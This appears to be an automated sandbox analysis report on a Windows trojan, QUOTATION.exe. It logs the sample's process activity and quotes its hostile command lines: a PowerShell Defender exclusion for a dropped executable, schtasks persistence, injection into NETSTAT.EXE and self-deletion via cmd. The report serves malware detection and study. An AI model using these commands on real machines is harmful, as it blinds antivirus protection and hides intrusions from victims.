          Source: QUOTATION.exe, 00000001.00000002.302035905.00000000059B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
          Source: QUOTATION.exe, 00000001.00000003.287892144.00000000037E4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs QUOTATION.exe
          Source: QUOTATION.exe, 0000000D.00000000.290403933.00000000003DA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000002.378944407.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000000.296533989.00000000005CA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs QUOTATION.exe
          Source: QUOTATION.exeBinary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
          Source: QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: lQdAGavApIJoo.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: QUOTATION.exeVirustotal: Detection: 40%
          Source: QUOTATION.exeReversingLabs: Detection: 18%
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION.exe "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Users\user\Desktop\QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8E88.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/8@2/1
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: QUOTATION.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: QUOTATION.exe, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: lQdAGavApIJoo.exe.1.dr, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.3.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.2.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.2.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 13.0.QUOTATION.exe.330000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.0.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.2.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.3.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.5.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.2.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.7.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 17.0.QUOTATION.exe.520000.9.unpack, Views/MainForm.cs.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_0036424F push es; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_003642B1 push cs; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00364287 push cs; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_003642DB push ss; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 1_2_00DAE768 pushfd ; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_0033424F push es; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_003342B1 push cs; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_00334287 push cs; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 13_2_003342DB push ss; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00417015 push esp; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041690B push cs; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0052424F push es; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_005242DB push ss; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00524287 push cs; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_005242B1 push cs; iretd
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0102D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0329D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_00747015 push esp; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074690B push cs; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074DC11 push gs; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D56C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D502 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0074D50B push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.84988973797
          Source: initial sampleStatic PE information: section name: .text entropy: 7.84988973797
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
